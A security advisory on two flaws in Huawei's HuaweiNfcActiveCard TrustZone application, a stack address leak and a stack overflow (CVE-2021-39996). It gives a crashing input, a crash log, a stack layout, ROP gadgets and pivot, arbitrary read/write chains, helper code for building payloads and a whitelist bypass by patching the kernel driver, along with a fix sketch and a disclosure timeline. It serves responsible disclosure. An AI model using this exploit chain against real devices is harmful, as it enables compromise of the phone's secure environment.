Huawei TrustZone HuaweiNfcActiveCard Vulnerability
This advisory contains information about the following vulnerabilities:

  • Information Leak in ParseAidList
  • Buffer Overflow in SplitAidStrtok (CVE-2021-39996)

The HuaweiNfcActiveCard TA conforms to the GlobalPlatform TEE Internal Core API. As such, it receives commands from a client application located in the normal world. These commands are handled by the TA_InvokeCommandEntryPoint function.

This TA implements 13 commands, but calling only CmdTeeHardwareSyncAidList (0x20002) is enough to trigger the vulnerabilities.

Information Leak in ParseAidList

There is an information leak in the ParseAidList function that can be used to leak the address of a buffer allocated on the stack. When combined with the second vulnerability, it can be used to obtain the TA base address. This information leak comes from a call to SLog in ParseAidList:

int ParseAidList() {
    char *list_elem;
    int list_elem_len;
    char stack_buf[0x1400];
    // [...]
    if (g_aidCount > 0) {
        for (list_elem = &g_aidList; ; list_elem += 0x100) {
            SLog("%s: ParseAidList Enter, g_aidList[%d]=%s\n", "[Trace]", index, list_elem);
            list_elem_len = strlen(list_elem);
            tmpCnt = SplitAidStrtok(stack_buf, list_elem, list_elem_len, ",");
            SLog("%s: ParseAidList Enter, tmpCnt=%d\n", "[Trace]", tmpCnt);
            if (tmpCnt < 2) {
                SLog("%s: ParseAidList : at least two property:type and aid\n", "[Error]");
            } else if (!strncmp(&stack_buf[0x100], "501", 3)) {
                // [...]
            }
            // [...] many more else ifs [...]
            else {
                SLog("%s: ParseAidList unknown card aidList=%s, type=%d\n", "[Error]", &stack_buf[0x100], stack_buf);
            }
            // [...]
        }
    }
    // [...]
}

Each list_elem in g_aidList is parsed using SplitAidStrtok, which splits the string on the "," separator and puts the resulting substrings in the stack buffer stack_buf, one every 0x100 bytes. The function expects at least two substrings, type and aid. If the second substring, at offset 0x100 in the stack buffer, doesn't match any of the expected values ("501", etc.), execution falls into the default case, which calls SLog with both substrings as arguments. However, the format specifier used for the type field, which receives stack_buf itself, is %d instead of %s, so SLog prints the address of the stack buffer instead of the string it contains:

[TA_HuaweiNfcActiveCard-1] [Error]: ParseAidList unknown card aidList=A, type=110212648
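
Because %d prints the pointer as a signed decimal integer, the leaked value has to be converted back into an address before it can be used. The following is a minimal sketch of that step. parse_stack_leak is a hypothetical helper name that does not come from the exploit, and the code assumes the log line has the shape shown above.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/*
 * Hypothetical helper (not from the original exploit): recovers the address
 * printed after "type=" in the SLog line.
 * Returns 0 on success, -1 if the field is missing or not a number.
 */
int parse_stack_leak(const char *log_line, uint32_t *out_addr) {
    const char *key = "type=";
    const char *field = strstr(log_line, key);
    char *end = NULL;
    long value;

    if (field == NULL)
        return -1;
    field += strlen(key);

    /* %d prints a signed decimal, so parse it as a signed value... */
    value = strtol(field, &end, 10);
    if (end == field)
        return -1;

    /* ...and reinterpret it as the unsigned 32-bit address it really is. */
    *out_addr = (uint32_t)value;
    return 0;
}
```

With the sample line above, the decimal value 110212648 corresponds to the address 0x0691B628.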

Buffer Overflow in SplitAidStrtok

The SplitAidStrtok function can write past the end of the buffer passed as its first argument. Depending on where the function is called from, this can be used to write user-controlled data into the BSS or, more interestingly, onto the stack. The overflow exists because SplitAidStrtok never checks how many substrings it copies into the output buffer.

int SplitAidStrtok(char *out_list, char *aidList, int aidLen, const char *separator) {
    // [...]
    const char *list_elem;
    size_t list_elem_len;
    char *next_elem_ptr;   // destination slot for the next substring
    int count;
    char *ptr;             // strtok_s context
    // [...]
    // sanity checks of the arguments
    list_elem = strtok_s(aidList, separator, &ptr);
    if (list_elem) {
        list_elem_len = strlen(list_elem);
        if (strncpy_s(out_list, 0x100, list_elem, list_elem_len))
            return 0xFFFF0006;
        next_elem_ptr = out_list + 0x100;
        count = 1;
        while (1) {
            list_elem = strtok_s(0, separator, &ptr);
            if (!list_elem)
                break;
            list_elem_len = strlen(list_elem);
            ++count;
            if (strncpy_s(next_elem_ptr, 0x100, list_elem, list_elem_len))
                return 0xFFFF0006;
            next_elem_ptr += 0x100;
        }
        return count;
    }
    // [...]
}

The function SplitAidStrtok calls strtok_s in a loop on the aidList string given as argument to retrieve the separator-separated substrings. For each of the substrings, it calls strncpy_s to copy it into out_list at an offset incremented by 0x100 each time.

For example, if aidList is "A,B,C", "A" will be copied to out_list+0x0, "B" to out_list+0x100 and "C" to out_list+0x200. But as you can see, there is no limit on the number of substrings that can be copied. That means that given a long enough aidList string, we can overflow the out_list buffer.
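
One way to close this hole is to tell the splitting routine how many 0x100-byte slots the destination holds and to refuse any substring beyond that. The following is a sketch of that idea in portable C, not Huawei's actual patch. split_bounded, SLOT_SIZE and max_slots are names chosen for illustration, and strspn/strcspn stand in for strtok_s so that the input string is left unmodified.

```c
#include <stddef.h>
#include <string.h>

#define SLOT_SIZE 0x100u  /* each substring gets a 0x100-byte slot, as in the TA */

/*
 * Illustrative bounded variant of the split routine (assumed design).
 * Copies each separator-delimited substring of input into consecutive slots
 * of out_list. Returns the number of substrings, or -1 if the input holds
 * more than max_slots substrings or one that does not fit in a slot.
 */
int split_bounded(char *out_list, size_t max_slots,
                  const char *input, const char *separators) {
    const char *cursor = input;
    size_t count = 0;

    for (;;) {
        size_t len;

        /* Skip leading separators, as strtok does. */
        cursor += strspn(cursor, separators);
        if (*cursor == '\0')
            break;

        len = strcspn(cursor, separators);

        /* The check missing from the vulnerable code: bound the slot index. */
        if (count >= max_slots || len >= SLOT_SIZE)
            return -1;

        memcpy(out_list + count * SLOT_SIZE, cursor, len);
        out_list[count * SLOT_SIZE + len] = '\0';
        count++;
        cursor += len;
    }
    return (int)count;
}
```

For a 0x1400-byte destination, max_slots would be 0x1400 / 0x100 = 20.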

SplitAidStrtok is called from two places:

int GetAidList(const char *aidList, int aidLen) {
    // [...]
    g_aidCount = SplitAidStrtok(&g_aidList, aidList, aidLen, "|");
    // [...]
}

In GetAidList, it can be used to overflow the g_aidList buffer of size 0x1400 that is allocated in the BSS (the aidList argument is fully user-controlled).

int ParseAidList() {
    char stack_buf[0x1400];
    // [...]
    list_elem = &g_aidList;
    for (index = 0; index < g_aidCount; ++index) {
        list_elem_len = strlen(list_elem);
        tmpCnt = SplitAidStrtok(stack_buf, list_elem, list_elem_len, ",");
        // [...]
        list_elem += 0x100;
    }
}

In ParseAidList, it can be used to overflow the stack_buf buffer of size 0x1400 that is allocated on the stack (the list_elem argument is user-controlled but limited to 255 bytes).

unsigned int CmdTeeHardwareSyncAidList(void *session, unsigned int paramTypes, TEE_Param *params) {
    // [...]
    // checking the parameters types
    // [...]
    buffer = params[0].memref.buffer;
    length = params[0].memref.length;
    WriteAidListToFile(buffer, length);
    GetAidList(buffer, length);
    ParseAidList();
}

The CmdTeeHardwareSyncAidList command expects a single parameter: an input buffer containing a single string. It will call the GetAidList function with this string. GetAidList will split it on "|" and store the substrings into the g_aidList global buffer. Then CmdTeeHardwareSyncAidList calls ParseAidList which splits each of the substrings in g_aidList on ",", puts the results in the stack buffer and processes them.
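
The two-stage split described above can be modelled offline to tell which buffer a given input would overflow. The following is a rough sketch under stated assumptions: overflow_stage and count_tokens are hypothetical helpers, SLOT_COUNT is derived from the 0x1400-byte buffers and 0x100-byte slots, and the model ignores the per-substring length check performed by strncpy_s.

```c
#include <stddef.h>
#include <string.h>

#define SLOT_COUNT 20u  /* 0x1400-byte buffer / 0x100-byte slots */

/* Counts the non-empty substrings of s[0..len) delimited by sep. */
size_t count_tokens(const char *s, size_t len, char sep) {
    size_t count = 0, i = 0;

    while (i < len) {
        while (i < len && s[i] == sep)   /* skip separators */
            i++;
        if (i == len)
            break;
        count++;
        while (i < len && s[i] != sep)   /* consume one substring */
            i++;
    }
    return count;
}

/*
 * Returns 0 if the input fits, 1 if the "|" split (GetAidList) would write
 * past g_aidList, 2 if a "," split (ParseAidList) would write past stack_buf.
 */
int overflow_stage(const char *input) {
    size_t len = strlen(input), i = 0;

    if (count_tokens(input, len, '|') > SLOT_COUNT)
        return 1;

    while (i < len) {
        size_t start;

        while (i < len && input[i] == '|')
            i++;
        start = i;
        while (i < len && input[i] != '|')
            i++;
        if (count_tokens(input + start, i - start, ',') > SLOT_COUNT)
            return 2;
    }
    return 0;
}
```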

An example input string that triggers a crash is "A,A,A,A,A,A,A,A,A,A,A,A,A,A,A,A,A,A,A,A,AAAAAAAAAAAAAAAAAAAAAAAA":

[HM] ESR_EL1: 82000006, ELR_EL1: 41414140, FAR is not valid
[HM] TA_HuaweiNfcAct vm fault prefetch abort: 41414140
[HM] fault: 82000006 tcb cref 2200000028
[HM] Registers dump:
[HM] ----------
[HM] 32 bits userspace stack dump:
[HM] ----------
[HM] <ParseAidList>+0x384/0x41c
[HM] [ERROR][2171]vmem_as_ondemand_prepare failed
[HM] [ERROR][2496]process 2200000028 (tid: 40) data abort:
[HM] [ERROR][2498]Bad memory access on address: 0x41414140, fault_code: 0x82000006
[HM]
[HM] Dump task states for tcb
[HM] ----------
[HM]     name=[TA_HuaweiNfcAct] tid=40 is-idle=0 is-curr=0
[HM]     state=BLOCKED@MEMFAULT sched.pol=0 prio=46 queued=1
[HM]     aff[0]=ff
[HM]     flags=1000 smc-switch=0 ca=8625 prefer-ca=8625
[HM] Registers dump:
[HM] ----------
[HM] 32 bits userspace stack dump:
[HM] ----------
[HM] <ParseAidList>+0x384/0x41c
[HM] Dump task states END
[HM]
[HM] [TRACE][1212]pid=48 exit_status=130

While there are stack cookies in the trustlet, surprisingly there is none in the ParseAidList function. As evidenced above, it is possible to overwrite a return address on the stack, and we will now see how to exploit it.
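
The structure of such a crashing input can be generated programmatically. The sketch below is an illustration rather than the exploit's code: build_overflow_element is a hypothetical name, and the constants assume the 0x1400-byte stack_buf and 0x100-byte slots described earlier. Twenty one-character fillers occupy every slot of stack_buf, so the final substring is copied to stack_buf + 0x1400, where the saved registers live.

```c
#include <stddef.h>
#include <string.h>

#define SLOT_SIZE      0x100u
#define STACK_BUF_SIZE 0x1400u
#define FILLER_COUNT   (STACK_BUF_SIZE / SLOT_SIZE)  /* 20 slots */

/*
 * Hypothetical helper: writes FILLER_COUNT "A," fillers followed by tail into
 * out. The tail is the substring that lands just past stack_buf.
 * Returns the string length, or 0 if out is too small.
 */
size_t build_overflow_element(char *out, size_t out_size,
                              const char *tail, size_t tail_len) {
    size_t needed = FILLER_COUNT * 2 + tail_len + 1;
    size_t pos = 0, i;

    if (out_size < needed)
        return 0;

    for (i = 0; i < FILLER_COUNT; i++) {
        out[pos++] = 'A';   /* one filler per 0x100-byte slot */
        out[pos++] = ',';
    }
    memcpy(out + pos, tail, tail_len);  /* lands at stack_buf + 0x1400 */
    pos += tail_len;
    out[pos] = '\0';
    return pos;
}
```

A 24-byte tail covers six 32-bit words, which matches the six saved registers (R4, R5, R6, R7, R11 and LR) in the stack layout shown in the exploitation section.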

Exploitation

Our Device Setup

The device we have developed an exploit for is a P40 Pro running the firmware update ELS-LGRP4-OVS_11.0.0.196. The trustlet binary MD5 checksum is as follows:

HWELS:/ ## md5sum /vendor/bin/5fce3ea5-fa71-4152-a30f-f46be8c924bf.sec
318662fa357d2701941706d775e1115f  /vendor/bin/5fce3ea5-fa71-4152-a30f-f46be8c924bf.sec

Huawei's TEE OS iTrustee implements a whitelist mechanism that only allows specific client applications (native binaries or APKs) to talk to a trusted application.

In our case, the HuaweiNfcActiveCard TA can only be called by 2 native binaries and an APK:

  • /vendor/bin/nfcgetcplc (uid 0);
  • /vendor/bin/hw/android.hardware.secure_element@1.0-service (uid 0 or 1068);
  • com.android.nfc (cert starting with c2851d1c).

The authentication mechanism is implemented in 3 parts:

  • the teecd daemon, that implements the TEE Client API, checks which native binary/APK is talking to it and sends that information to the kernel driver;
  • the kernel driver ensures that it is talking to teecd, and forwards the information it received to the TEE OS;
  • the TEE OS verifies that the client application is in the TA's whitelist.

Since we did not want to bother with injecting code in one of these binaries, we chose to circumvent the authentication by patching the kernel driver to add the ability to impersonate any native binary/APK.

Leaking The ASLR Slide

To obtain the base address of the trustlet, the first step is to leak the address of stack_buf in ParseAidList. To do that we trigger the information leak presented in the previous section by sending an input string containing an unknown aid ("A,A" in the exploit).

The second step is to leak an address in the trustlet .text section. The stack layout around the stack_buf buffer, that we are able to overflow thanks to the second vulnerability, is as follows:

0x1A40 ┌────────────────┐
       │       LR     ──┼──► .text + 0x1364
0x1A3C ├────────────────┤
       │       R11      │
0x1A38 ├────────────────┤
       │       R7       │
0x1A34 ├────────────────┤
       │       R6     ──┼──► saved length
0x1A30 ├────────────────┤
       │       R5     ──┼──► saved buffer
0x1A2C ├────────────────┤
       │       R4       │
0x1A28 ├────────────────┤
       │                │
       │                │
       │                │
       │    stack_buf   │
       │                │
       │                │
       │                │
0x0628 └────────────────┘

The second dword after stack_buf is the value of the R5 register that was pushed at the beginning of ParseAidList. This value is popped at the end of ParseAidList, right before execution returns to CmdTeeHardwareSyncAidList. In CmdTeeHardwareSyncAidList, the R5 register is then passed as an argument to a call to SLog with the format specifier %s, which lets us leak the bytes at this address (up to the first null byte). Since we are interested in leaking a code address, we can choose to overwrite the saved R5 with the address of the LR saved when entering ParseAidList.
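
The address arithmetic behind this step can be sketched as follows. The function names are hypothetical, and the offsets are read off the stack layout above: the saved R5 sits 0x1404 bytes above the start of stack_buf and the saved LR 0x1414 bytes above it. The offset of the return address inside the trustlet image is left as a parameter because it depends on the binary. The check on byte values reflects the fact that a single substring cannot carry a null byte (strlen stops there) or a separator character (strtok_s splits there).

```c
#include <stdint.h>

#define STACK_BUF_SIZE  0x1400u
#define SAVED_R5_OFFSET (STACK_BUF_SIZE + 0x04u)  /* R4 comes first, then R5 */
#define SAVED_LR_OFFSET (STACK_BUF_SIZE + 0x14u)  /* after R4, R5, R6, R7, R11 */

/* Address of the saved R5 slot, given the leaked address of stack_buf. */
uint32_t saved_r5_address(uint32_t stack_buf_addr) {
    return stack_buf_addr + SAVED_R5_OFFSET;
}

/* Address of the saved LR slot, i.e. the value to place in the saved R5. */
uint32_t saved_lr_address(uint32_t stack_buf_addr) {
    return stack_buf_addr + SAVED_LR_OFFSET;
}

/* Returns 1 if value can be carried by one substring, 0 otherwise. */
int is_copyable(uint32_t value) {
    int i;

    for (i = 0; i < 4; i++) {
        uint8_t byte = (uint8_t)(value >> (8 * i));
        if (byte == 0x00 || byte == ',' || byte == '|')
            return 0;
    }
    return 1;
}

/* Base address, given the leaked LR and its (binary-specific) image offset. */
uint32_t ta_base_from_leak(uint32_t leaked_lr, uint32_t lr_offset_in_image) {
    return leaked_lr - lr_offset_in_image;
}
```

In the sample exploit output further down, the leaked code address and the computed base differ by 0x2608, which would be the image offset of the return address on that particular firmware.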

Arbitrary Read / Write

By overwriting the saved LR instead of the saved R5, we can execute different ROP chains that allow us to perform arbitrary reads and writes. In our ROP chains, we need to be careful not to overflow too many values on the stack, as we want to keep the saved registers of the previous stack frames, so that we can pop them back later. To that effect, we chose to stack pivot into the input buffer mapped from the normal world using the following gadgets:

pop {r11,pc}
---
sub sp, r11, #4
pop {r11,pc}

We obtained the input buffer address (0x70003000) empirically and using knowledge from past exploits.
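
To make the effect of the two pivot gadgets concrete, here is a toy model of their semantics. It is one plausible reading of how they chain, not a description of the actual ROP chain: cpu_t, load_word and the word-array memory are illustrative constructs, and only the three registers touched by the gadgets are modelled.

```c
#include <stdint.h>

/* Toy CPU state: only the registers the two gadgets touch. */
typedef struct {
    uint32_t sp;
    uint32_t r11;
    uint32_t pc;
} cpu_t;

/* Toy memory: mem[addr / 4] holds the 32-bit word at byte address addr. */
uint32_t load_word(const uint32_t *mem, uint32_t addr) {
    return mem[addr / 4];
}

/* Models: pop {r11,pc} */
void gadget_pop_r11_pc(cpu_t *cpu, const uint32_t *mem) {
    cpu->r11 = load_word(mem, cpu->sp);
    cpu->pc  = load_word(mem, cpu->sp + 4);
    cpu->sp += 8;
}

/* Models: sub sp, r11, #4 ; pop {r11,pc} */
void gadget_pivot(cpu_t *cpu, const uint32_t *mem) {
    cpu->sp = cpu->r11 - 4;        /* the stack now points at R11 - 4 */
    gadget_pop_r11_pc(cpu, mem);   /* next R11 and PC come from the new stack */
}
```

If the first gadget loads R11 with new_stack + 4 and returns into the second gadget, the stack pointer ends up at new_stack + 8 and the next R11 and PC values are read from the new stack, leaving the original stack frames above untouched.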

The ROP chain for the arbitrary write is built around the following gadget:

str r3, [r4,#4]
sub sp, r11, #0xc
pop {r4,r5,r11,pc}
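
The register values this gadget needs follow directly from its three instructions. The sketch below computes them. regs_for_write and write_regs_t are hypothetical names, and how R3, R4 and R11 are loaded beforehand (presumably by earlier gadgets in the chain) is not covered here.

```c
#include <stdint.h>

/* Register values to set up before jumping to the write gadget. */
typedef struct {
    uint32_t r3;
    uint32_t r4;
    uint32_t r11;
} write_regs_t;

/*
 * target:     address to write to
 * value:      32-bit value to store
 * next_frame: address where the following {r4,r5,r11,pc} values are laid out
 */
write_regs_t regs_for_write(uint32_t target, uint32_t value,
                            uint32_t next_frame) {
    write_regs_t regs;

    regs.r3  = value;             /* str r3, [r4,#4] stores R3...          */
    regs.r4  = target - 4;        /* ...at R4 + 4, hence the adjustment    */
    regs.r11 = next_frame + 0xc;  /* sub sp, r11, #0xc moves SP to the     */
                                  /* frame consumed by pop {r4,r5,r11,pc}  */
    return regs;
}
```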

The ROP chain for the arbitrary read is more complex, as we could not find any gadget performing a load from a register inside the trustlet. Instead we decided to chain a call to WriteAidListToFile(src_addr, 4) with a call to ReadAidListFromFile(dst_addr, &{4}). This is effectively equivalent to a call to memcpy(dst_addr, src_addr, 4).

Because the first parameter is an input buffer and not an in-out buffer, the TEE OS does not copy it back to the normal world on return, so we cannot use it to retrieve our value. Instead, we write the value onto the stack, pop it into a register with a gadget, and then move it into R0. This way, it becomes the return code of the command.

In the exploit, we demonstrate our write primitive by writing to the .data section, and our read primitive by dumping the trustlet memory:

adb wait-for-device shell su root sh -c 0 "/data/local/tmp/ta_huaweinfcactivecard"
stack_leak_addr = 69ce628
code_leak_addr = 3ee0608
ta_base_addr = 3ede000
got_addr = 69c6000
bss_start = 12345678
bss_start = deadbeef
Trustlet memory dump:
0x03ede000: f0 4f 2d e9 54 c1 9f e5 20 b0 8d e2 84 d0 4d e2 .O-.T... .....M.
0x03ede010: 00 30 9c e5 00 00 51 e3 98 00 0b e5 28 30 0b e5 .0....Q.....(0..
0x03ede020: 49 00 00 0a 12 00 52 e3 3d 00 00 ca 30 31 9f e5 I.....R.=...01..
0x03ede030: c2 9f a0 e1 92 03 c3 e0 43 92 79 e0 21 00 00 4a ........C.y.!..J

Getting Code Execution

While it is not demonstrated in the exploit, gadgets in the shared libraries (libc_shared_a32.so, libtee_shared_a32.so, libvendor_shared_a32.so, etc.) can also be used since they are also mapped in the trustlet's address space. Their base address can be found by reading the content of the GOT.

For example, this could be used to make arbitrary syscalls and potentially further escalate privileges.

Affected Devices

We have verified that the vulnerability impacted the following device(s):

  • Kirin 990: P40 Pro (ELS)

Please note that other models might have been affected.

Patch

Name                               Severity  CVE             Patch
Buffer Overflow in SplitAidStrtok  Critical  CVE-2021-39996  December 2021

Timeline

  • Oct. 06, 2021 - A vulnerability report is sent to Huawei PSIRT.
  • Oct. 25, 2021 - Huawei PSIRT acknowledges the vulnerability report.
  • Dec. 01, 2021 - Huawei PSIRT states that these issues were fixed in the December 2021 update.
  • From Nov. 30, 2022 to Jul. 19, 2023 - We exchange regularly about the release of our advisories.